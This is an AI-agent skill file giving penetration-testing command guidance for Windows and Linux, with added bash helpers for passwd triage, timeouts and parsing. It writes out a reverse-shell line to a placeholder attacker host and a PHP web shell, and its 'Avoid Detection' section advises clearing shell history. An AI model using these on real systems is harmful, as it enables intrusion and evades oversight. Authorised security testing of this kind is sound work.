Secbot command-execution

install
source · Clone the upstream repo
git clone https://github.com/iammm0/secbot
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/iammm0/secbot "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/base/command-execution" ~/.claude/skills/iammm0-secbot-command-execution && rm -rf "$T"
manifest: skills/base/command-execution/SKILL.md
source content

Command Execution in Security Testing

Overview

This skill provides guidance on running system commands, and parsing their output, on Windows and Linux hosts during penetration testing engagements.

Windows Commands

Network Discovery

# Local IP configuration
ipconfig /all

# Network connections
netstat -ano

# Active connections
netstat -ano | findstr ESTABLISHED

# ARP table
arp -a

# DNS lookup
nslookup target.com

Process Management

# List processes
tasklist /v

# Find specific process
tasklist | findstr python

# Kill process
taskkill /F /PID <pid>

File System

# List directory
dir /a /s

# Find files
dir /s /b *.exe

# File attributes
attrib

User & Group

# User accounts
net user

# Current user
whoami /all

# Local groups
net localgroup

# User info
net user <username>

Linux Commands

Network Discovery

# Network interfaces
ip addr show

# Listening ports (netstat comes from net-tools and is often absent on modern hosts; ss is the iproute2 replacement)
netstat -tulpn

# All TCP/UDP sockets with owning process, established and listening (-l alone would show only listeners)
ss -tunap

# ARP table (arp is also net-tools; ip neigh show is the iproute2 equivalent)
arp -a

# DNS resolution
dig target.com

Process Management

# List processes
ps aux

# Find process (the bracket trick keeps the grep command itself out of the match)
ps aux | grep '[p]ython'

# Kill process (SIGKILL; try plain kill <pid> first so the process can exit cleanly)
kill -9 <pid>

# Process tree (shows parent/child relationships, useful for spotting what spawned a shell)
pstree

File System

# Find executable files (-executable is a GNU find extension)
find / -type f -executable 2>/dev/null

# Files modified in the last 24 hours
find / -mtime -1 2>/dev/null

# SUID files (privilege-escalation candidates; compare the list against the distribution's default set and the binary's known abuse paths)
find / -perm -4000 -type f 2>/dev/null

User & Group

# Current user
id

# Sudoers (readable only by root; as an unprivileged user, sudo -l shows what the current account may run instead)
cat /etc/sudoers
sudo -l

# User accounts
cat /etc/passwd

# Groups
cat /etc/group
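Reading /etc/passwd is only useful if you know what to look for in it. The functions below are an added example, not part of the secbot skill: they read passwd-format lines from stdin (so they work both on the real file, e.g. `uid0_accounts < /etc/passwd`, and on the constructed sample embedded here) and pull out the three things worth checking first, a second UID 0 account, accounts with an interactive shell, and locally created users. The function names, the sample content and the UID 1000 cut-off are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the secbot skill): triage /etc/passwd instead of
# just cat-ing it. Every function reads passwd lines from stdin.

# Constructed sample; the second uid-0 entry ("toor") is deliberate and is
# the kind of thing this triage exists to surface.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
toor:x:0:0::/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/zsh
backup:x:34:34:backup:/var/backups:/bin/false
deploy:x:1001:1001::/srv/deploy:/bin/sh'

# Accounts whose numeric UID (field 3) is 0. Anything besides root is a
# root-equivalent account: a classic persistence/backdoor indicator.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }'
}

# Accounts with an interactive shell (field 7 not nologin/false): the real
# logon surface for password guessing, key hunting and lateral movement.
login_accounts() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 ":" $7 }'
}

# UID >= 1000 is the conventional UID_MIN for accounts created after install on
# Debian- and RHEL-style systems (assumption; check /etc/login.defs). Prints
# the name and home directory, which is where keys and histories live.
local_users() {
    awk -F: '$3 >= 1000 && $1 != "nobody" { print $1 " " $6 }'
}

# Usage on the constructed sample (swap in `< /etc/passwd` on a real host):
printf '%s\n' "$SAMPLE_PASSWD" | uid0_accounts
printf '%s\n' "$SAMPLE_PASSWD" | login_accounts
printf '%s\n' "$SAMPLE_PASSWD" | local_users
```

Field-based awk filters are preferable to `grep bash /etc/passwd` style checks because they cannot be fooled by a GECOS comment or a home path that happens to contain the search word.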

Security Testing Commands

Enumeration

# Service version detection
nmap -sV <target>

# OS detection (needs raw sockets, so run as root/Administrator)
nmap -O <target>

# Vulnerability scripts
nmap --script vuln <target>

Web Testing

# curl basic
curl -v http://target

# POST request
curl -X POST -d "param=value" http://target

# Fetch over HTTPS ignoring certificate errors (self-signed lab certs); -k disables verification, it does not test the TLS configuration
curl -k https://target

Shells

# Reverse shell
bash -i >& /dev/tcp/attacker/port 0>&1

# Web shell upload test
echo "<?php system(\$_GET['cmd']); ?>" > shell.php

Best Practices

  1. Avoid Detection

    • Use encoded commands when possible
    • Keep output small: filter with findstr/grep rather than dumping full listings
    • Clear history after commands (only where the rules of engagement allow it):
      history -c
      (this clears only the current shell's in-memory list; run unset HISTFILE first so nothing is written to disk when the shell exits)
  2. Error Handling

    • Always check the exit status ($? on Linux, %ERRORLEVEL% on Windows); a non-zero status usually means the tool was missing or blocked, not "no results"
    • Merge stderr into stdout so error text is captured together with the output:
      2>&1
    • Wrap long-running commands in timeout (Linux) so a hung target does not stall the run; timeout exits with status 124 when the limit is hit
  3. Cross-Platform

    • Use portable commands when possible
    • Test commands in isolated environment first
    • Consider WSL for Linux tools on Windows

Timeout Recommendations

Command type                     Recommended timeout
Quick check (ping, whoami)       10s
Network scan                     60s
File search                      120s
Large transfer                   300s
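The error-handling practices above and this timeout table fit together in one wrapper. The function below is an added example, not code from the secbot skill: `run_cmd` takes a timeout in seconds from the table, runs the command under GNU coreutils timeout(1), merges stderr into stdout so the caller has a single stream to parse, logs the outcome, and returns the command's own exit status (124 when the limit was hit). The function name and log format are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the secbot skill): enforce a timeout and surface the
# exit status instead of trusting that a command "just worked".

# run_cmd SECONDS COMMAND [ARGS...]
#   Runs COMMAND under timeout(1) from GNU coreutils. stderr is merged into
#   stdout (2>&1) so the caller receives one stream; a one-line verdict goes to
#   this shell's stderr. Returns the command's exit status; timeout(1) reports
#   124 when the limit was reached.
run_cmd() {
    local secs="$1"; shift
    local out rc
    # -k 2: escalate to SIGKILL if the command ignores SIGTERM for 2 more seconds.
    # `local out` is declared separately so the assignment does not mask $?.
    out=$(timeout -k 2 "$secs" "$@" 2>&1)
    rc=$?
    case "$rc" in
        0)   printf '[ok]      %s\n' "$*" >&2 ;;
        124) printf '[timeout] %ss exceeded: %s\n' "$secs" "$*" >&2 ;;
        *)   printf '[rc=%d]   %s\n' "$rc" "$*" >&2 ;;
    esac
    printf '%s\n' "$out"
    return "$rc"
}

# Usage with the table's values: a quick check gets 10s, a network scan would
# get 60s (e.g. run_cmd 60 nmap -sV <target>), a file search 120s.
run_cmd 10 whoami
# Deliberately short limit to show the 124 path being handled rather than ignored.
run_cmd 1 sleep 5 || echo "timed out, rc=$?"
```

Checking for 124 separately from other non-zero codes matters: a timed-out scan and a scan that was blocked by a host firewall both fail, but only one of them is worth retrying with a longer limit.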

Output Parsing

Extract specific information from command output:

# IPv4 addresses only
ipconfig | findstr "IPv4"

# Connections involving port 80 (the trailing space keeps :8080 and :8000 from matching; /C: treats the quoted string as one literal)
netstat -ano | findstr /C:":80 "

# Count results
netstat -ano | findstr ESTABLISHED | find /c /v ""
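The findstr pipelines above do the job on Windows, but substring matching is fragile: `findstr ESTABLISHED` also counts a line whose process name or address happens to contain the word. The functions below are an added example, not part of the secbot skill, showing the same three extractions on Linux with awk over `ss -tunap` output, matched on the state and address columns rather than on raw substrings. They read from stdin so they work on live output (`ss -tunap | peers_on_port 443`) and on the constructed sample embedded here; the function names and the sample lines are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the secbot skill): column-aware parsing of ss output.

# Constructed `ss -tunap` output. Columns: Netid State Recv-Q Send-Q
# Local:Port Peer:Port Process. IPv6 addresses appear in brackets.
SAMPLE_SS='Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port   Process
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*           users:(("sshd",pid=812,fd=3))
tcp   ESTAB  0      0      10.0.0.5:22        10.0.0.9:51234      users:(("sshd",pid=2311,fd=4))
tcp   ESTAB  0      0      10.0.0.5:443       198.51.100.7:40112  users:(("nginx",pid=1400,fd=12))
tcp   ESTAB  0      0      10.0.0.5:443       203.0.113.20:55902  users:(("nginx",pid=1400,fd=13))
tcp   ESTAB  0      0      [::1]:5432         [::1]:38800         users:(("postgres",pid=990,fd=9))
udp   UNCONN 0      0      0.0.0.0:53         0.0.0.0:*           users:(("systemd-resolve",pid=500,fd=12))'

# Peer addresses of established connections to one local port: the Linux
# counterpart of `netstat -ano | findstr :80`, but exact on the port number.
# The port is the digits after the last colon, which also works for [::1]:5432.
peers_on_port() {
    awk -v port="$1" '
        $2 == "ESTAB" && match($5, /:[0-9]+$/) && substr($5, RSTART + 1) == port {
            peer = $6; sub(/:[0-9]+$/, "", peer); print peer
        }'
}

# Count sockets in a given state (ESTAB, LISTEN, UNCONN ...): the counterpart
# of `findstr ESTABLISHED | find /c /v ""`, restricted to the State column.
count_state() {
    awk -v st="$1" '$2 == st { n++ } END { print n + 0 }'
}

# Unique PIDs owning sockets in a given state, ready for ps/kill.
pids_in_state() {
    awk -v st="$1" '$2 == st && match($0, /pid=[0-9]+/) {
        print substr($0, RSTART + 4, RLENGTH - 4)
    }' | sort -un
}

# Usage on the constructed sample (pipe live `ss -tunap` output instead):
printf '%s\n' "$SAMPLE_SS" | peers_on_port 443
printf '%s\n' "$SAMPLE_SS" | count_state ESTAB
printf '%s\n' "$SAMPLE_SS" | pids_in_state ESTAB
```

Stripping the port with a regex anchored at the end of the field is what makes this safe for IPv6 peers; splitting on `:` would break on `[::1]:38800`.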